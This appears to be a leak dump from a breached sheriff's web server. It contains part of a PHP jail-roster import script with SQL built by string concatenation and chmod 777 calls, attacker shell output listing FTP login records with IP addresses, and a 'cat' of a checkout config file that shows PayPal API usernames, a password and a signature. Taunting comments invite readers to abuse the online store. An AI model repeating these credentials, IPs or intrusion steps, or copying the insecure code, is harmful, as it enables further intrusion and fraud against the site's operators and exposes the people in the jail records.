&& filesize('/var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt') !=

'4096'){

$OLDinmates = build_old_inmates();

$NEWinmates = build_new_inmates();

//print_r($OLDinmates);

foreach($OLDinmates as $key => $booking_number){

if(!in_array($booking_number,$NEWinmates)){

echo $booking_number,PHP_EOL;

print_r($NEWinmates);

echo PHP_EOL;

release_inmate($booking_number);

}

}

safe_query('DELETE FROM dymin_jail_roster WHERE release_date = ""');

parse_csv('/var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.

txt','dymin_jail_roster',$field_map);

}

unset($field_map);

$field_map[0] = 'booking_num';

$field_map[1] = 'charge';

$field_map[2] = 'bond';

if(is_file('/var/www/vhosts/jocomosheriff.org/home/Export/

RosterChargesExport.txt')){

safe_query('DELETE FROM dymin_jail_roster_charges');

safe_query('UPDATE dymin_jail_roster SET charges = "" WHERE release_date

= ""');

parse_csv('/var/www/vhosts/jocomosheriff.org/home/Export/

RosterChargesExport.txt','dymin_jail_roster_charges',$field_map);

$q = 'SELECT * FROM dymin_jail_roster_charges';

$r = safe_query($q);

while($row = mysql_fetch_array($r)){

$q = 'UPDATE dymin_jail_roster SET charges =

CONCAT(charges,"'.$row['charge'].'<br>") WHERE release_date = "" AND booking_num

= "'.$row['booking_num'].'"';

safe_query($q);

//echo $q,PHP_EOL;

}

$q = 'SELECT * FROM dymin_jail_roster';

$r = safe_query($q);

while($row = mysql_fetch_array($r,MYSQL_ASSOC)){

$q = 'UPDATE dymin_jail_roster SET bond = (SELECT sum(bond) FROM

dymin_jail_roster_charges WHERE booking_num = "'.$row['booking_num'].'") WHERE

booking_num = "'.$row['booking_num'].'" AND release_date = ""';

safe_query($q);

//echo $q,PHP_EOL;

}

}

remove_old_inmates();

if(is_file('/var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt')

){

$file = '/var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt';

$newfile =

'/var/www/vhosts/jocomosheriff.org/home/export_backup/RosterExport_'.date('

Y_m_d_His').'.txt';

if (!copy($file, $newfile)) {

echo "failed to copy $file...

";

}else{

unlink('/var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.

txt');

if(is_file('/var/www/vhosts/jocomosheriff.org/home/Export/

RosterChargesExport.txt')){

unlink('/var/www/vhosts/jocomosheriff.org/home/Export/

RosterChargesExport.txt');

}

}

}

//shell_exec('cp -rpufT

/var/www/vhosts/jocomosheriff.org/home/Export/Images/

/var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized/');

//shell_exec('mogrify -resize 200x200

/var/www/vhosts/jocomosheriff.org/home/Export/Images/*.jpg');

//shell_exec('mogrify -resize 200x200

/var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized/*.jpg');

shell_exec('chmod -R 777

/var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized/');

shell_exec('chown -R root:root

/var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized');

$files = scandir('/var/www/vhosts/jocomosheriff.org/home/Export/Images/');

foreach($files as $k => $v){

if(strpos($v,'.JPG') !== false || strpos($v,'.jpg') !== false){

$q = 'SELECT * FROM dymin_jail_roster WHERE image1 LIKE "%'.$v.'%"';

if(mysql_num_rows(safe_query($q)) > 0){

if(!is_file('/var/www/vhosts/jocomosheriff.org/httpdocs/images/

inmates/resized/'.$v)){

shell_exec('cp -rpufT

/var/www/vhosts/jocomosheriff.org/home/Export/Images/'.$v.'

/var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized/'.$v);

echo 'Copied -

'.'/var/www/vhosts/jocomosheriff.org/home/Export/Images/'.$v.' TO

/var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized/'.$v.PHP_EOL;

}

}else{

//do nothing for now

}

}

//echo $v.'<br>';

}

$files =

scandir('/var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized/');

foreach($files as $k => $v){

if(strpos($v,'.JPG') !== false || strpos($v,'.jpg') !== false){

$q = 'SELECT * FROM dymin_jail_roster WHERE image1 LIKE "%'.$v.'%"';

if(mysql_num_rows(safe_query($q)) > 0){

echo $v.' - Valid Image'.PHP_EOL;

shell_exec('mogrify -resize 200x200

/var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized/'.$v);

}else{

//shell_exec('rm -f

/var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized/'.$v);

//shell_exec('rm -f

/var/www/vhosts/jocomosheriff.org/home/Export/'.$v);

echo 'Removing - '.$v.PHP_EOL;

}

}

//echo $v.'<br>';

}

echo PHP_EOL,date('m/d/Y H:i:s'),' -- Finished',PHP_EOL;

?>

# last > last.txt; wc last.txt

78726 787247 6061786 last.txt

// WHY YES THESE ARE JAIL IPS SYNCING THEIR INMATE ROSTER FILES TO THE WEB

# head -n 5 last.txt

jonms_sy ftpd8479 173.166.203.165 Sat Jul 23 14:43 - 14:43 (00:00)

pcsoks_s ftpd8064 24.248.200.101 Sat Jul 23 14:40 - 14:40 (00:00)

pcsoks_s ftpd8056 24.248.200.101 Sat Jul 23 14:40 - 14:40 (00:00)

pcsoks_s ftpd8054 24.248.200.101 Sat Jul 23 14:40 - 14:40 (00:00)

jonms_sy ftpd3730 173.166.203.165 Sat Jul 23 14:28 - 14:28 (00:00)

// JUST IN CASE ANYONE WANTED TO PLAY WITH THEIR ONLINE STORE. WE SURE DID

# cat /var/www/vhosts/mosheriffs.com/httpdocs/checkout/constants.php

<?php

define('API_TEST_MODE',false);

/****************************************************

constants.php

This is the configuration file for the samples.This file

defines the parameters needed to make an API call.

PayPal includes the following API Signature for making API

calls to the PayPal sandbox:

API Username sdk-three_api1.sdk.com

API Password QFZCWN5HZM8VBG7Q

API Signature A-IzJhZZjhg29XQ2qnhapuwxIDzyAZQ92FRP5dqBzVesOkzbdUONzmOU

Called by CallerService.php.

****************************************************/

/**

# API user: The user that is identified as making the call. you can

# also use your own API username that you created on PayPalï¿½s sandbox

# or the PayPal live site

*/

if(!API_TEST_MODE){

define('API_USERNAME', 'info_api1.mosheriffs.com');

}else{

define('API_USERNAME', 'galexa_1252510976_biz_api1.bjmweb.com');

}

/**

# API_password: The password associated with the API user

# If you are using your own API username, enter the API password that

# was generated by PayPal below

# IMPORTANT - HAVING YOUR API PASSWORD INCLUDED IN THE MANNER IS NOT

# SECURE, AND